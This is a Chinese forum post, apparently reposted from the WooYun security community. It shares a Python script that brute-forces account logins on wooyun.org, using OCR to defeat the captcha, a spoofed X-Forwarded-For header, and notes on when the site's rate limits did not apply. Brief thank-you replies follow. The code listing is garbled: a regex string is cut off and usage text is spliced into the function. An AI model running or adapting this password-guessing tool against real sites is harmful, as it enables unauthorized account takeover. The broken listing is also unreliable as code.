[python]乌云账号暴力猜解工具

小男孩

版权声明：本文转自Rona发自乌云社区
原文链接：http://zone.wooyun.org/content/15378
需要预安装如下程序
1、pytesseract （可以pip install pytesseract安装）
2、Python Imaging Library (PIL)
3、tesseract-ocr
原理：
1、利用tesseract 进行验证码的识别。
2、post暴力猜解
问题1.验证码的识别率
进行了一次处理，从正则里可以看到pattern = '^[a-zA-Z0-9]{4}$' 只取识别为4位的字符，如果不是则重新请求验证码，这个在很大程度上提高了识别率。
问题2.服务端频率验证
经过我两天的实验观察，早上会有次数限制，连续两天的下午我尝试了大于1161次的登陆都没有限制，不知道是什么原因，也许是我网络问题

1. 
   
2. #coding: utf-8
   
3. #date: 2014/09/23
   
4. #author: titans
   
5. 
   
6. import cookielib
   
7. import urllib2
   
8. import urllib
   
9. import socket
   
10. import sys
    
11. import time
    
12. import re
    
13. import Image
    
14. import pytesseract
    
15. 
    
16. 
    
17. 
    
18. def guess_login(url, users, passwords):
    
19.   cj = cookielib.CookieJar()
    
20.   opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
    
21.   opener.addheaders = [
    
22.     ('User-Agent','Mozilla/5.0 (Windows NT 5.1; rv:24.0) Gecko/20100101 Firefox/24.0'),
    
23.     ('Accept','text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'),
    
24.     ('Accept-Encoding','gzip, deflate'),
    
25.     ('Connection', 'keep-alive'),
    
26.     ('X-Forwarded-For','127.0.0.1'),
    
27.   ]
    
28.   urllib2.install_opener(opener)
    
29.   captcha = ''
    
30. 
    
31.    
    
32.   catp_url = 'http://www.wooyun.org/captcha.php'
    
33.    
    
34.   pattern = '^[a-zA-Z0-9]{4}
    
35. 
    
36. windows下使用，如果linux下测试，修改存放验证码的路径c:\\temp\capta.jpg 改为linux下的路径即可
    
37. usage:  wooyun.py users.txt passwords.txt
    
38.   regex = re.compile(pattern)
    
39.   for user in users:
    
40.     user = user.strip()
    
41.     find = False
    
42.     for password in passwords:
    
43.       while_mark = 1
    
44.       password = password.strip()
    
45.       
    
46.       while(while_mark):
    
47. 
    
48.         opener.open(url)
    
49.         pic = opener.open(catp_url)
    
50.         content = pic.read()
    
51.         f = open('c:\\temp\capta.jpg','wb')
    
52.         f.write(content)
    
53.         f.close()
    
54.         time.sleep(1)
    
55.         captcha = pytesseract.image_to_string(Image.open('c:\\temp\capta.jpg'))
    
56.          
    
57.         re_result = regex.match(captcha)
    
58.         if re_result:
    
59.           print user, password, captcha
    
60.           post_data = 'email=%s&password=%s&captcha=%s'%(user,password,captcha)
    
61.           post_url =  'http://www.wooyun.org/user.php?action=login&do=login'
    
62.           resp = opener.open(post_url,post_data)
    
63.           while_mark = 0
    
64.           cookies = resp.info().getheaders('Set-Cookie')
    
65.           if len(cookies):
    
66.             
    
67.             find = True
    
68.             raw_input('Get it!!%s %s'%(user,password))
    
69.         else:
    
70.           print '[*]Repeat request'
    
71.           pass
    
72.       if find == True:
    
73.         break
    
74. 
    
75. def run():
    
76.   if len(sys.argv) !=3:
    
77.     usage()
    
78.   url = 'http://www.wooyun.org/user.php?action=login'
    
79.   users = open(sys.argv[1],'r').readlines()
    
80.   passwords = open(sys.argv[2],'r').readlines()
    
81.   guess_login(url, users, passwords)
    
82. def usage():
    
83.   print 'wooyun.py users.txt passwords.txt'
    
84.   exit(0)
    
85. if __name__ == '__main__':
    
86.   run()
    
87. 
    

复制代码

windows下使用，如果linux下测试，修改存放验证码的路径c:\\temp\capta.jpg 改为linux下的路径即可
usage:  wooyun.py users.txt passwords.txt

yooz

谢谢分享阿

Andre

学习了，感谢分享

sky9

SDFASFSDFSADF

snet

爆破个乌云账号 那厉害了

13113486108

看看，学习下

helloqyz

楼主真是 辛苦啊 还在奋斗